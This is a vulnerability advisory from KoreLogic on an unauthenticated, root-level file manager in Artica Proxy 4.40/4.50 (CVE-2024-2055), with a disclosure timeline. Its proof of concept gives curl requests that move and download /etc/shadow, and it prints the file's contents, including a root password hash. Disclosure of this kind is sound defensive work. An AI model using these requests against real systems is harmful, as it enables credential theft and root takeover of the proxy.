Artica Proxy 4.40 / 4.50 Authentication Bypass / Privilege Escalation

`KL-001-2024-003: Artica Proxy Unauthenticated File Manager Vulnerability  
  
Title: Artica Proxy Unauthenticated File Manager Vulnerability  
Advisory ID: KL-001-2024-003  
Publication Date: 2024.03.05  
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2024-003.txt  
  
  
1. Vulnerability Details  
  
Affected Vendor: Artica  
Affected Product: Artica Proxy  
Affected Version: 4.40 and 4.50  
Platform: Debian 10 LTS  
CWE Classification: CWE-288: Authentication Bypass Using an  
Alternate Path or Channel, CWE-552: Files  
or Directories Accessible to External  
Parties  
CVE ID: CVE-2024-2055  
  
  
2. Vulnerability Description  
  
The "Rich Filemanager" feature of Artica Proxy provides a  
web-based interface for file management capabilities. When  
the feature is enabled, it does not require authentication by  
default, and runs as the root user.  
  
  
3. Technical Description  
  
The Artica Proxy can be installed with a small amount of  
"Features" enabled. Within the administrative web interface,  
additional features can be installed, enabled, and disabled. The  
"Rich Filemanager" feature is disabled by default. Enabling  
this feature will spawn a listener on port 5000/tcp bound to  
0.0.0.0. By default, when this feature is enabled, authentication  
is not required to access the web interface. The "Rich  
Filemanager" runs as the root user. This provides an  
unauthenticated attacker complete access to the file system.  
  
root@artica:~# ps -efww | grep -i File  
root 1888 1885 0 09:13 ? 00:00:00 php-fpm: pool RICHFILEMANAGER  
root 1889 1885 0 09:13 ? 00:00:00 php-fpm: pool RICHFILEMANAGER  
  
This can be exploited by an attacker to add entries in to  
/etc/shadow, /etc/passwd, and /etc/ssh/sshd_config to create  
an additional root-level account that has the ability to SSH  
in to the system.  
  
  
4. Mitigation and Remediation Recommendation  
  
No response from vendor. Rich Filemanager feature is disabled  
by default. Leave it that way.  
  
  
5. Credit  
  
This vulnerability was discovered by Jim Becher of KoreLogic,  
Inc.  
  
  
6. Disclosure Timeline  
  
2023.12.18 - KoreLogic requests vulnerability contact and  
secure communication method from Artica.  
2023.12.18 - Artica Support issues automated ticket #1703011342  
promising follow-up from a human.  
2024.01.10 - KoreLogic again requests vulnerability contact and  
secure communication method from Artica.  
2024.01.10 - KoreLogic mail daemon receives SMTP 554 5.7.1 from  
mail.articatech.com with response  
"Client host rejected: Go Away!"  
2024.01.11 - KoreLogic requests vulnerability contact and  
secure communication method via  
https://www.articatech.com/ 'Contact Us' web form.  
2024.01.23 - KoreLogic requests CVE from MITRE.  
2024.01.23 - MITRE issues automated ticket #1591692 promising  
follow-up from a human.  
2024.02.01 - 30 business days have elapsed since KoreLogic  
attempted to contact the vendor.  
2024.02.06 - KoreLogic requests update on CVE from MITRE.  
2024.02.15 - KoreLogic requests update on CVE from MITRE.  
2024.02.22 - KoreLogic reaches out to alternate CNA for  
CVE identifiers.  
2024.02.26 - 45 business days have elapsed since KoreLogic  
attempted to contact the vendor.  
2024.02.29 - Vulnerability details presented to AHA!  
(takeonme.org) by proxy.  
2024.03.01 - AHA! issues CVE-2024-2055 to track this  
vulnerability.  
2024.03.05 - KoreLogic public disclosure.  
  
  
7. Proof of Concept  
  
Step 1: Move /etc/shadow to /tmp/shadow  
$ curl -s -k -X $'GET' -H $'Host: 192.168.2.139:5000' -H $'Accept: application/json, text/javascript, */*; q=0.01'   
-H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'X-Requested-With: XMLHttpRequest' -H   
$'Connection: close'   
$'http://192.168.2.139:5000/connectors/php/filemanager.php?time=1700885542096&mode=move&old=%2Fetc%2Fshadow&new=%2Ftmp%2F&_=1700868631198'  
  
{"data":{"id":"\/tmp\/shadow","type":"file","attributes":{"name":"shadow","path":"\/tmp\/shadow","readable":1,"writable":1,"created":"","modified":"24   
Nov 2023 15:55","timestamp":1700862914,"height":0,"width":0,"size":"2037"}}}  
  
Step 2: Download /tmp/shadow  
$ curl -s -k -X $'GET' -H $'Host: 192.168.2.139:5000' -H $'Accept:   
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H   
$'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' -H $'Pragma: no-cache' -H   
$'Cache-Control: no-cache'   
$'http://192.168.2.139:5000/connectors/php/filemanager.php?mode=download&path=%2Ftmp%2Fshadow&time=1700885590870'  
  
root:$6$Pvb1ivrg5oo.a/om$xtRvfpBBSZgPt/fDjHzw9k9e.jxWaY.LPOqnqHJcSBuQMxtjtG6pBBMMf1Z6D4jtN6kDSB3h5FufJ9DuXv.7R0:19507:0:99999:7:::  
daemon:*:19507:0:99999:7:::  
bin:*:19507:0:99999:7:::  
sys:*:19507:0:99999:7:::  
sync:*:19507:0:99999:7:::  
games:*:19507:0:99999:7:::  
man:*:19507:0:99999:7:::  
lp:*:19507:0:99999:7:::  
mail:*:19507:0:99999:7:::  
news:*:19507:0:99999:7:::  
uucp:*:19507:0:99999:7:::  
proxy:*:19507:0:99999:7:::  
www-data:*:19507:0:99999:7:::  
backup:*:19507:0:99999:7:::  
list:*:19507:0:99999:7:::  
irc:*:19507:0:99999:7:::  
gnats:*:19507:0:99999:7:::  
nobody:*:19507:0:99999:7:::  
_apt:*:19507:0:99999:7:::  
systemd-timesync:*:19507:0:99999:7:::  
systemd-network:*:19507:0:99999:7:::  
systemd-resolve:*:19507:0:99999:7:::  
messagebus:*:19507:0:99999:7:::  
quagga:*:19507:0:99999:7:::  
apt-mirror:*:19507:0:99999:7:::  
privoxy:*:19507:0:99999:7:::  
ntp:*:19507:0:99999:7:::  
redsocks:!:19507:0:99999:7:::  
prads:*:19507:0:99999:7:::  
freerad:*:19507:0:99999:7:::  
vnstat:*:19507:0:99999:7:::  
stunnel4:!:19507:0:99999:7:::  
sshd:*:19507:0:99999:7:::  
vde2-net:*:19507:0:99999:7:::  
memcache:!:19507:0:99999:7:::  
davfs2:*:19507:0:99999:7:::  
ziproxy:!:19507:0:99999:7:::  
proftpd:!:19507:0:99999:7:::  
ftp:*:19507:0:99999:7:::  
mosquitto:*:19507:0:99999:7:::  
openldap:!:19507:0:99999:7:::  
munin:*:19507:0:99999:7:::  
msmtp:*:19507:0:99999:7:::  
Debian-snmp:!:19507:0:99999:7:::  
opendkim:*:19507:0:99999:7:::  
avahi:*:19507:0:99999:7:::  
glances:*:19507:0:99999:7:::  
ArticaStats:!:19507:0:99999:7:::  
netdata:!:19507:0:99999:7:::  
mysql:!:19507:0:99999:7:::  
postfix:!:19507:0:99999:7:::  
squid:!:19507:0:99999:7:::  
smokeping:!:19507:0:99999:7:::  
unbound:!:19645:0:99999:7:::  
  
Step 3: Move /tmp/shadow back to /etc/shadow as not to create a DoS condition  
$ curl -s -k -X $'GET' -H $'Host: 192.168.2.139:5000' -H $'Accept: application/json, text/javascript, */*; q=0.01'   
-H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'X-Requested-With: XMLHttpRequest' -H   
$'Connection: close'   
$'http://192.168.2.139:5000/connectors/php/filemanager.php?time=1700885798719&mode=move&old=%2Ftmp%2Fshadow&new=%2Fetc%2F&_=1700868631208'  
  
{"data":{"id":"\/etc\/shadow","type":"file","attributes":{"name":"shadow","path":"\/etc\/shadow","readable":0,"writable":1,"created":"","modified":"24   
Nov 2023 15:55","timestamp":1700862914,"height":0,"width":0,"size":0}}}  
  
  
The contents of this advisory are copyright(c) 2024  
KoreLogic, Inc. and are licensed under a Creative Commons  
Attribution Share-Alike 4.0 (United States) License:  
http://creativecommons.org/licenses/by-sa/4.0/  
  
KoreLogic, Inc. is a founder-owned and operated company with a  
proven track record of providing security services to entities  
ranging from Fortune 500 to small and mid-sized companies. We  
are a highly skilled team of senior security consultants doing  
by-hand security assessments for the most important networks in  
the U.S. and around the world. We are also developers of various  
tools and resources aimed at helping the security community.  
https://www.korelogic.com/about-korelogic.html  
  
Our public vulnerability disclosure policy is available at:  
https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt  
  
`